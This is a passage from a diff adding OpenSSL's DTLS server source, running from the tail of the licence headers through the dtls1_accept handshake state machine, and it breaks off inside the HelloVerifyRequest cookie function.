+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "ssl_locl.h"
+#include <openssl/buffer.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/md5.h>
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+
+static const SSL_METHOD *dtls1_get_server_method(int ver);
+static int dtls1_send_hello_verify_request(SSL *s);
+
+static const SSL_METHOD *dtls1_get_server_method(int ver)
+{
+    if (ver == DTLS1_VERSION)
+        return (DTLSv1_server_method());
+    else if (ver == DTLS1_2_VERSION)
+        return (DTLSv1_2_server_method());
+    else
+        return (NULL);
+}
+
+IMPLEMENT_dtls1_meth_func(DTLS1_VERSION,
+                          DTLSv1_server_method,
+                          dtls1_accept,
+                          ssl_undefined_function,
+                          dtls1_get_server_method, DTLSv1_enc_data)
+
+    IMPLEMENT_dtls1_meth_func(DTLS1_2_VERSION,
+                          DTLSv1_2_server_method,
+                          dtls1_accept,
+                          ssl_undefined_function,
+                          dtls1_get_server_method, DTLSv1_2_enc_data)
+
+    IMPLEMENT_dtls1_meth_func(DTLS_ANY_VERSION,
+                          DTLS_server_method,
+                          dtls1_accept,
+                          ssl_undefined_function,
+                          dtls1_get_server_method, DTLSv1_2_enc_data)
+
+int dtls1_accept(SSL *s)
+{
+    BUF_MEM *buf;
+    unsigned long Time = (unsigned long)time(NULL);
+    void (*cb) (const SSL *ssl, int type, int val) = NULL;
+    unsigned long alg_k;
+    int ret = -1;
+    int new_state, state, skip = 0;
+    int listen;
+#ifndef OPENSSL_NO_SCTP
+    unsigned char sctpauthkey[64];
+    char labelbuffer[sizeof(DTLS1_SCTP_AUTH_LABEL)];
+#endif
+
+    RAND_add(&Time, sizeof(Time), 0);
+    ERR_clear_error();
+    clear_sys_error();
+
+    if (s->info_callback != NULL)
+        cb = s->info_callback;
+    else if (s->ctx->info_callback != NULL)
+        cb = s->ctx->info_callback;
+
+    listen = s->d1->listen;
+
+    /* init things to blank */
+    s->in_handshake++;
+    if (!SSL_in_init(s) || SSL_in_before(s))
+        SSL_clear(s);
+
+    s->d1->listen = listen;
+#ifndef OPENSSL_NO_SCTP
+    /*
+     * Notify SCTP BIO socket to enter handshake mode and prevent stream
+     * identifier other than 0. Will be ignored if no SCTP is used.
+     */
+    BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_SET_IN_HANDSHAKE,
+             s->in_handshake, NULL);
+#endif
+
+    if (s->cert == NULL) {
+        SSLerr(SSL_F_DTLS1_ACCEPT, SSL_R_NO_CERTIFICATE_SET);
+        return (-1);
+    }
+#ifndef OPENSSL_NO_HEARTBEATS
+    /*
+     * If we're awaiting a HeartbeatResponse, pretend we already got and
+     * don't await it anymore, because Heartbeats don't make sense during
+     * handshakes anyway.
+     */
+    if (s->tlsext_hb_pending) {
+        dtls1_stop_timer(s);
+        s->tlsext_hb_pending = 0;
+        s->tlsext_hb_seq++;
+    }
+#endif
+
+    for (;;) {
+        state = s->state;
+
+        switch (s->state) {
+        case SSL_ST_RENEGOTIATE:
+            s->renegotiate = 1;
+            /* s->state=SSL_ST_ACCEPT; */
+
+        case SSL_ST_BEFORE:
+        case SSL_ST_ACCEPT:
+        case SSL_ST_BEFORE | SSL_ST_ACCEPT:
+        case SSL_ST_OK | SSL_ST_ACCEPT:
+
+            s->server = 1;
+            if (cb != NULL)
+                cb(s, SSL_CB_HANDSHAKE_START, 1);
+
+            if ((s->version & 0xff00) != (DTLS1_VERSION & 0xff00)) {
+                SSLerr(SSL_F_DTLS1_ACCEPT, ERR_R_INTERNAL_ERROR);
+                return -1;
+            }
+            s->type = SSL_ST_ACCEPT;
+
+            if (s->init_buf == NULL) {
+                if ((buf = BUF_MEM_new()) == NULL) {
+                    ret = -1;
+                    goto end;
+                }
+                if (!BUF_MEM_grow(buf, SSL3_RT_MAX_PLAIN_LENGTH)) {
+                    BUF_MEM_free(buf);
+                    ret = -1;
+                    goto end;
+                }
+                s->init_buf = buf;
+            }
+
+            if (!ssl3_setup_buffers(s)) {
+                ret = -1;
+                goto end;
+            }
+
+            s->init_num = 0;
+            s->d1->change_cipher_spec_ok = 0;
+            /*
+             * Should have been reset by ssl3_get_finished, too.
+             */
+            s->s3->change_cipher_spec = 0;
+
+            if (s->state != SSL_ST_RENEGOTIATE) {
+                /*
+                 * Ok, we now need to push on a buffering BIO so that the
+                 * output is sent in a way that TCP likes :-) ...but not with
+                 * SCTP :-)
+                 */
+#ifndef OPENSSL_NO_SCTP
+                if (!BIO_dgram_is_sctp(SSL_get_wbio(s)))
+#endif
+                    if (!ssl_init_wbio_buffer(s, 1)) {
+                        ret = -1;
+                        goto end;
+                    }
+
+                ssl3_init_finished_mac(s);
+                s->state = SSL3_ST_SR_CLNT_HELLO_A;
+                s->ctx->stats.sess_accept++;
+            } else {
+                /*
+                 * s->state == SSL_ST_RENEGOTIATE, we will just send a
+                 * HelloRequest
+                 */
+                s->ctx->stats.sess_accept_renegotiate++;
+                s->state = SSL3_ST_SW_HELLO_REQ_A;
+            }
+
+            break;
+
+        case SSL3_ST_SW_HELLO_REQ_A:
+        case SSL3_ST_SW_HELLO_REQ_B:
+
+            s->shutdown = 0;
+            dtls1_clear_record_buffer(s);
+            dtls1_start_timer(s);
+            ret = ssl3_send_hello_request(s);
+            if (ret <= 0)
+                goto end;
+            s->s3->tmp.next_state = SSL3_ST_SR_CLNT_HELLO_A;
+            s->state = SSL3_ST_SW_FLUSH;
+            s->init_num = 0;
+
+            ssl3_init_finished_mac(s);
+            break;
+
+        case SSL3_ST_SW_HELLO_REQ_C:
+            s->state = SSL_ST_OK;
+            break;
+
+        case SSL3_ST_SR_CLNT_HELLO_A:
+        case SSL3_ST_SR_CLNT_HELLO_B:
+        case SSL3_ST_SR_CLNT_HELLO_C:
+
+            s->shutdown = 0;
+            ret = ssl3_get_client_hello(s);
+            if (ret <= 0)
+                goto end;
+            dtls1_stop_timer(s);
+
+            if (ret == 1 && (SSL_get_options(s) & SSL_OP_COOKIE_EXCHANGE))
+                s->state = DTLS1_ST_SW_HELLO_VERIFY_REQUEST_A;
+            else
+                s->state = SSL3_ST_SW_SRVR_HELLO_A;
+
+            s->init_num = 0;
+
+            /*
+             * Reflect ClientHello sequence to remain stateless while
+             * listening
+             */
+            if (listen) {
+                memcpy(s->s3->write_sequence, s->s3->read_sequence,
+                       sizeof(s->s3->write_sequence));
+            }
+
+            /* If we're just listening, stop here */
+            if (listen && s->state == SSL3_ST_SW_SRVR_HELLO_A) {
+                ret = 2;
+                s->d1->listen = 0;
+                /*
+                 * Set expected sequence numbers to continue the handshake.
+                 */
+                s->d1->handshake_read_seq = 2;
+                s->d1->handshake_write_seq = 1;
+                s->d1->next_handshake_write_seq = 1;
+                goto end;
+            }
+
+            break;
+
+        case DTLS1_ST_SW_HELLO_VERIFY_REQUEST_A:
+        case DTLS1_ST_SW_HELLO_VERIFY_REQUEST_B:
+
+            ret = dtls1_send_hello_verify_request(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_SW_FLUSH;
+            s->s3->tmp.next_state = SSL3_ST_SR_CLNT_HELLO_A;
+
+            /* HelloVerifyRequest resets Finished MAC */
+            if (s->version != DTLS1_BAD_VER)
+                ssl3_init_finished_mac(s);
+            break;
+
+#ifndef OPENSSL_NO_SCTP
+        case DTLS1_SCTP_ST_SR_READ_SOCK:
+
+            if (BIO_dgram_sctp_msg_waiting(SSL_get_rbio(s))) {
+                s->s3->in_read_app_data = 2;
+                s->rwstate = SSL_READING;
+                BIO_clear_retry_flags(SSL_get_rbio(s));
+                BIO_set_retry_read(SSL_get_rbio(s));
+                ret = -1;
+                goto end;
+            }
+
+            s->state = SSL3_ST_SR_FINISHED_A;
+            break;
+
+        case DTLS1_SCTP_ST_SW_WRITE_SOCK:
+            ret = BIO_dgram_sctp_wait_for_dry(SSL_get_wbio(s));
+            if (ret < 0)
+                goto end;
+
+            if (ret == 0) {
+                if (s->d1->next_state != SSL_ST_OK) {
+                    s->s3->in_read_app_data = 2;
+                    s->rwstate = SSL_READING;
+                    BIO_clear_retry_flags(SSL_get_rbio(s));
+                    BIO_set_retry_read(SSL_get_rbio(s));
+                    ret = -1;
+                    goto end;
+                }
+            }
+
+            s->state = s->d1->next_state;
+            break;
+#endif
+
+        case SSL3_ST_SW_SRVR_HELLO_A:
+        case SSL3_ST_SW_SRVR_HELLO_B:
+            s->renegotiate = 2;
+            dtls1_start_timer(s);
+            ret = ssl3_send_server_hello(s);
+            if (ret <= 0)
+                goto end;
+
+            if (s->hit) {
+#ifndef OPENSSL_NO_SCTP
+                /*
+                 * Add new shared key for SCTP-Auth, will be ignored if no
+                 * SCTP used.
+                 */
+                snprintf((char *)labelbuffer, sizeof(DTLS1_SCTP_AUTH_LABEL),
+                         DTLS1_SCTP_AUTH_LABEL);
+
+                SSL_export_keying_material(s, sctpauthkey,
+                                           sizeof(sctpauthkey), labelbuffer,
+                                           sizeof(labelbuffer), NULL, 0, 0);
+
+                BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_ADD_AUTH_KEY,
+                         sizeof(sctpauthkey), sctpauthkey);
+#endif
+#ifndef OPENSSL_NO_TLSEXT
+                if (s->tlsext_ticket_expected)
+                    s->state = SSL3_ST_SW_SESSION_TICKET_A;
+                else
+                    s->state = SSL3_ST_SW_CHANGE_A;
+#else
+                s->state = SSL3_ST_SW_CHANGE_A;
+#endif
+            } else
+                s->state = SSL3_ST_SW_CERT_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_SW_CERT_A:
+        case SSL3_ST_SW_CERT_B:
+            /* Check if it is anon DH or normal PSK */
+            if (!(s->s3->tmp.new_cipher->algorithm_auth & SSL_aNULL)
+                && !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK)) {
+                dtls1_start_timer(s);
+                ret = ssl3_send_server_certificate(s);
+                if (ret <= 0)
+                    goto end;
+#ifndef OPENSSL_NO_TLSEXT
+                if (s->tlsext_status_expected)
+                    s->state = SSL3_ST_SW_CERT_STATUS_A;
+                else
+                    s->state = SSL3_ST_SW_KEY_EXCH_A;
+            } else {
+                skip = 1;
+                s->state = SSL3_ST_SW_KEY_EXCH_A;
+            }
+#else
+            } else
+                skip = 1;
+
+            s->state = SSL3_ST_SW_KEY_EXCH_A;
+#endif
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_SW_KEY_EXCH_A:
+        case SSL3_ST_SW_KEY_EXCH_B:
+            alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
+
+            /*
+             * clear this, it may get reset by
+             * send_server_key_exchange
+             */
+            s->s3->tmp.use_rsa_tmp = 0;
+
+            /*
+             * only send if a DH key exchange or RSA but we have a sign only
+             * certificate
+             */
+            if (0
+                /*
+                 * PSK: send ServerKeyExchange if PSK identity hint if
+                 * provided
+                 */
+#ifndef OPENSSL_NO_PSK
+                || ((alg_k & SSL_kPSK) && s->ctx->psk_identity_hint)
+#endif
+                || (alg_k & (SSL_kEDH | SSL_kDHr | SSL_kDHd))
+                || (alg_k & SSL_kEECDH)
+                || ((alg_k & SSL_kRSA)
+                    && (s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey == NULL
+                        || (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher)
+                            && EVP_PKEY_size(s->cert->pkeys
+                                             [SSL_PKEY_RSA_ENC].privatekey) *
+                            8 > SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher)
+                        )
+                    )
+                )
+                ) {
+                dtls1_start_timer(s);
+                ret = ssl3_send_server_key_exchange(s);
+                if (ret <= 0)
+                    goto end;
+            } else
+                skip = 1;
+
+            s->state = SSL3_ST_SW_CERT_REQ_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_SW_CERT_REQ_A:
+        case SSL3_ST_SW_CERT_REQ_B:
+            if (                /* don't request cert unless asked for it: */
+                   !(s->verify_mode & SSL_VERIFY_PEER) ||
+                   /*
+                    * if SSL_VERIFY_CLIENT_ONCE is set, don't request cert
+                    * during re-negotiation:
+                    */
+                   ((s->session->peer != NULL) &&
+                    (s->verify_mode & SSL_VERIFY_CLIENT_ONCE)) ||
+                   /*
+                    * never request cert in anonymous ciphersuites (see
+                    * section "Certificate request" in SSL 3 drafts and in
+                    * RFC 2246):
+                    */
+                   ((s->s3->tmp.new_cipher->algorithm_auth & SSL_aNULL) &&
+                    /*
+                     * ... except when the application insists on
+                     * verification (against the specs, but s3_clnt.c accepts
+                     * this for SSL 3)
+                     */
+                    !(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT)) ||
+                   /*
+                    * never request cert in Kerberos ciphersuites
+                    */
+                   (s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5)
+                   /*
+                    * With normal PSK Certificates and Certificate Requests
+                    * are omitted
+                    */
+                   || (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK)) {
+                /* no cert request */
+                skip = 1;
+                s->s3->tmp.cert_request = 0;
+                s->state = SSL3_ST_SW_SRVR_DONE_A;
+#ifndef OPENSSL_NO_SCTP
+                if (BIO_dgram_is_sctp(SSL_get_wbio(s))) {
+                    s->d1->next_state = SSL3_ST_SW_SRVR_DONE_A;
+                    s->state = DTLS1_SCTP_ST_SW_WRITE_SOCK;
+                }
+#endif
+            } else {
+                s->s3->tmp.cert_request = 1;
+                dtls1_start_timer(s);
+                ret = ssl3_send_certificate_request(s);
+                if (ret <= 0)
+                    goto end;
+#ifndef NETSCAPE_HANG_BUG
+                s->state = SSL3_ST_SW_SRVR_DONE_A;
+# ifndef OPENSSL_NO_SCTP
+                if (BIO_dgram_is_sctp(SSL_get_wbio(s))) {
+                    s->d1->next_state = SSL3_ST_SW_SRVR_DONE_A;
+                    s->state = DTLS1_SCTP_ST_SW_WRITE_SOCK;
+                }
+# endif
+#else
+                s->state = SSL3_ST_SW_FLUSH;
+                s->s3->tmp.next_state = SSL3_ST_SR_CERT_A;
+# ifndef OPENSSL_NO_SCTP
+                if (BIO_dgram_is_sctp(SSL_get_wbio(s))) {
+                    s->d1->next_state = s->s3->tmp.next_state;
+                    s->s3->tmp.next_state = DTLS1_SCTP_ST_SW_WRITE_SOCK;
+                }
+# endif
+#endif
+                s->init_num = 0;
+            }
+            break;
+
+        case SSL3_ST_SW_SRVR_DONE_A:
+        case SSL3_ST_SW_SRVR_DONE_B:
+            dtls1_start_timer(s);
+            ret = ssl3_send_server_done(s);
+            if (ret <= 0)
+                goto end;
+            s->s3->tmp.next_state = SSL3_ST_SR_CERT_A;
+            s->state = SSL3_ST_SW_FLUSH;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_SW_FLUSH:
+            s->rwstate = SSL_WRITING;
+            if (BIO_flush(s->wbio) <= 0) {
+                /*
+                 * If the write error was fatal, stop trying
+                 */
+                if (!BIO_should_retry(s->wbio)) {
+                    s->rwstate = SSL_NOTHING;
+                    s->state = s->s3->tmp.next_state;
+                }
+
+                ret = -1;
+                goto end;
+            }
+            s->rwstate = SSL_NOTHING;
+            s->state = s->s3->tmp.next_state;
+            break;
+
+        case SSL3_ST_SR_CERT_A:
+        case SSL3_ST_SR_CERT_B:
+            if (s->s3->tmp.cert_request) {
+                ret = ssl3_get_client_certificate(s);
+                if (ret <= 0)
+                    goto end;
+            }
+            s->init_num = 0;
+            s->state = SSL3_ST_SR_KEY_EXCH_A;
+            break;
+
+        case SSL3_ST_SR_KEY_EXCH_A:
+        case SSL3_ST_SR_KEY_EXCH_B:
+            ret = ssl3_get_client_key_exchange(s);
+            if (ret <= 0)
+                goto end;
+#ifndef OPENSSL_NO_SCTP
+            /*
+             * Add new shared key for SCTP-Auth, will be ignored if no SCTP
+             * used.
+             */
+            snprintf((char *)labelbuffer, sizeof(DTLS1_SCTP_AUTH_LABEL),
+                     DTLS1_SCTP_AUTH_LABEL);
+
+            SSL_export_keying_material(s, sctpauthkey,
+                                       sizeof(sctpauthkey), labelbuffer,
+                                       sizeof(labelbuffer), NULL, 0, 0);
+
+            BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_ADD_AUTH_KEY,
+                     sizeof(sctpauthkey), sctpauthkey);
+#endif
+
+            s->state = SSL3_ST_SR_CERT_VRFY_A;
+            s->init_num = 0;
+
+            if (ret == 2) {
+                /*
+                 * For the ECDH ciphersuites when the client sends its ECDH
+                 * pub key in a certificate, the CertificateVerify message is
+                 * not sent.
+                 */
+                s->state = SSL3_ST_SR_FINISHED_A;
+                s->init_num = 0;
+            } else if (SSL_USE_SIGALGS(s)) {
+                s->state = SSL3_ST_SR_CERT_VRFY_A;
+                s->init_num = 0;
+                if (!s->session->peer)
+                    break;
+                /*
+                 * For sigalgs freeze the handshake buffer at this point and
+                 * digest cached records.
+                 */
+                if (!s->s3->handshake_buffer) {
+                    SSLerr(SSL_F_DTLS1_ACCEPT, ERR_R_INTERNAL_ERROR);
+                    return -1;
+                }
+                s->s3->flags |= TLS1_FLAGS_KEEP_HANDSHAKE;
+                if (!ssl3_digest_cached_records(s))
+                    return -1;
+            } else {
+                s->state = SSL3_ST_SR_CERT_VRFY_A;
+                s->init_num = 0;
+
+                /*
+                 * We need to get hashes here so if there is a client cert,
+                 * it can be verified
+                 */
+                s->method->ssl3_enc->cert_verify_mac(s,
+                                                     NID_md5,
+                                                     &(s->s3->
+                                                       tmp.cert_verify_md
+                                                       [0]));
+                s->method->ssl3_enc->cert_verify_mac(s, NID_sha1,
+                                                     &(s->s3->
+                                                       tmp.cert_verify_md
+                                                       [MD5_DIGEST_LENGTH]));
+            }
+            break;
+
+        case SSL3_ST_SR_CERT_VRFY_A:
+        case SSL3_ST_SR_CERT_VRFY_B:
+            /*
+             * This *should* be the first time we enable CCS, but be
+             * extra careful about surrounding code changes. We need
+             * to set this here because we don't know if we're
+             * expecting a CertificateVerify or not.
+             */
+            if (!s->s3->change_cipher_spec)
+                s->d1->change_cipher_spec_ok = 1;
+            /* we should decide if we expected this one */
+            ret = ssl3_get_cert_verify(s);
+            if (ret <= 0)
+                goto end;
+#ifndef OPENSSL_NO_SCTP
+            if (BIO_dgram_is_sctp(SSL_get_wbio(s)) &&
+                state == SSL_ST_RENEGOTIATE)
+                s->state = DTLS1_SCTP_ST_SR_READ_SOCK;
+            else
+#endif
+                s->state = SSL3_ST_SR_FINISHED_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_SR_FINISHED_A:
+        case SSL3_ST_SR_FINISHED_B:
+            /*
+             * Enable CCS for resumed handshakes.
+             * In a full handshake, we end up here through
+             * SSL3_ST_SR_CERT_VRFY_B, so change_cipher_spec_ok was
+             * already set. Receiving a CCS clears the flag, so make
+             * sure not to re-enable it to ban duplicates.
+             * s->s3->change_cipher_spec is set when a CCS is
+             * processed in d1_pkt.c, and remains set until
+             * the client's Finished message is read.
+             */
+            if (!s->s3->change_cipher_spec)
+                s->d1->change_cipher_spec_ok = 1;
+            ret = ssl3_get_finished(s, SSL3_ST_SR_FINISHED_A,
+                                    SSL3_ST_SR_FINISHED_B);
+            if (ret <= 0)
+                goto end;
+            dtls1_stop_timer(s);
+            if (s->hit)
+                s->state = SSL_ST_OK;
+#ifndef OPENSSL_NO_TLSEXT
+            else if (s->tlsext_ticket_expected)
+                s->state = SSL3_ST_SW_SESSION_TICKET_A;
+#endif
+            else
+                s->state = SSL3_ST_SW_CHANGE_A;
+            s->init_num = 0;
+            break;
+
+#ifndef OPENSSL_NO_TLSEXT
+        case SSL3_ST_SW_SESSION_TICKET_A:
+        case SSL3_ST_SW_SESSION_TICKET_B:
+            ret = ssl3_send_newsession_ticket(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_SW_CHANGE_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_SW_CERT_STATUS_A:
+        case SSL3_ST_SW_CERT_STATUS_B:
+            ret = ssl3_send_cert_status(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_SW_KEY_EXCH_A;
+            s->init_num = 0;
+            break;
+
+#endif
+
+        case SSL3_ST_SW_CHANGE_A:
+        case SSL3_ST_SW_CHANGE_B:
+
+            s->session->cipher = s->s3->tmp.new_cipher;
+            if (!s->method->ssl3_enc->setup_key_block(s)) {
+                ret = -1;
+                goto end;
+            }
+
+            ret = dtls1_send_change_cipher_spec(s,
+                                                SSL3_ST_SW_CHANGE_A,
+                                                SSL3_ST_SW_CHANGE_B);
+
+            if (ret <= 0)
+                goto end;
+
+#ifndef OPENSSL_NO_SCTP
+            if (!s->hit) {
+                /*
+                 * Change to new shared key of SCTP-Auth, will be ignored if
+                 * no SCTP used.
+                 */
+                BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_NEXT_AUTH_KEY,
+                         0, NULL);
+            }
+#endif
+
+            s->state = SSL3_ST_SW_FINISHED_A;
+            s->init_num = 0;
+
+            if (!s->method->ssl3_enc->change_cipher_state(s,
+                                                          SSL3_CHANGE_CIPHER_SERVER_WRITE))
+            {
+                ret = -1;
+                goto end;
+            }
+
+            dtls1_reset_seq_numbers(s, SSL3_CC_WRITE);
+            break;
+
+        case SSL3_ST_SW_FINISHED_A:
+        case SSL3_ST_SW_FINISHED_B:
+            ret = ssl3_send_finished(s,
+                                     SSL3_ST_SW_FINISHED_A,
+                                     SSL3_ST_SW_FINISHED_B,
+                                     s->method->
+                                     ssl3_enc->server_finished_label,
+                                     s->method->
+                                     ssl3_enc->server_finished_label_len);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_SW_FLUSH;
+            if (s->hit) {
+                s->s3->tmp.next_state = SSL3_ST_SR_FINISHED_A;
+
+#ifndef OPENSSL_NO_SCTP
+                /*
+                 * Change to new shared key of SCTP-Auth, will be ignored if
+                 * no SCTP used.
+                 */
+                BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_NEXT_AUTH_KEY,
+                         0, NULL);
+#endif
+            } else {
+                s->s3->tmp.next_state = SSL_ST_OK;
+#ifndef OPENSSL_NO_SCTP
+                if (BIO_dgram_is_sctp(SSL_get_wbio(s))) {
+                    s->d1->next_state = s->s3->tmp.next_state;
+                    s->s3->tmp.next_state = DTLS1_SCTP_ST_SW_WRITE_SOCK;
+                }
+#endif
+            }
+            s->init_num = 0;
+            break;
+
+        case SSL_ST_OK:
+            /* clean a few things up */
+            ssl3_cleanup_key_block(s);
+
+#if 0
+            BUF_MEM_free(s->init_buf);
+            s->init_buf = NULL;
+#endif
+
+            /* remove buffering on output */
+            ssl_free_wbio_buffer(s);
+
+            s->init_num = 0;
+
+            if (s->renegotiate == 2) { /* skipped if we just sent a
+                                        * HelloRequest */
+                s->renegotiate = 0;
+                s->new_session = 0;
+
+                ssl_update_cache(s, SSL_SESS_CACHE_SERVER);
+
+                s->ctx->stats.sess_accept_good++;
+                /* s->server=1; */
+                s->handshake_func = dtls1_accept;
+
+                if (cb != NULL)
+                    cb(s, SSL_CB_HANDSHAKE_DONE, 1);
+            }
+
+            ret = 1;
+
+            /* done handshaking, next message is client hello */
+            s->d1->handshake_read_seq = 0;
+            /* next message is server hello */
+            s->d1->handshake_write_seq = 0;
+            s->d1->next_handshake_write_seq = 0;
+            goto end;
+            /* break; */
+
+        default:
+            SSLerr(SSL_F_DTLS1_ACCEPT, SSL_R_UNKNOWN_STATE);
+            ret = -1;
+            goto end;
+            /* break; */
+        }
+
+        if (!s->s3->tmp.reuse_message && !skip) {
+            if (s->debug) {
+                if ((ret = BIO_flush(s->wbio)) <= 0)
+                    goto end;
+            }
+
+            if ((cb != NULL) && (s->state != state)) {
+                new_state = s->state;
+                s->state = state;
+                cb(s, SSL_CB_ACCEPT_LOOP, 1);
+                s->state = new_state;
+            }
+        }
+        skip = 0;
+    }
+ end:
+    /* BIO_flush(s->wbio); */
+
+    s->in_handshake--;
+#ifndef OPENSSL_NO_SCTP
+    /*
+     * Notify SCTP BIO socket to leave handshake mode and prevent stream
+     * identifier other than 0. Will be ignored if no SCTP is used.
+     */
+    BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_SET_IN_HANDSHAKE,
+             s->in_handshake, NULL);
+#endif
+
+    if (cb != NULL)
+        cb(s, SSL_CB_ACCEPT_EXIT, ret);
+    return (ret);
+}
+
+int dtls1_send_hello_verify_request(SSL *s)
+{
+    unsigned int msg_len;
+    unsigned char *msg, *buf, *p;
+
+    if (s->state == DTLS1_ST_SW_HELLO_VERIFY_REQUEST_A) {
+        buf = (unsigned char *)s->init_buf->data;
+
+        msg = p = &(buf[DTLS1_HM_HEADER_LENGTH]);
+        /* Always use DTLS 1.0 version: see RFC 6347 */
+        *(p++) = DTLS1_VERSION >> 8;
+        *(p++) = DTLS1_VERSION & 0xFF;
+
+        if (s->ctx->app_gen_cookie_cb == NULL ||
+            s->ctx->app_gen_cookie_cb(s, s->d1->cookie,
+                                      &(s->d1->cookie_len)) == 0) {
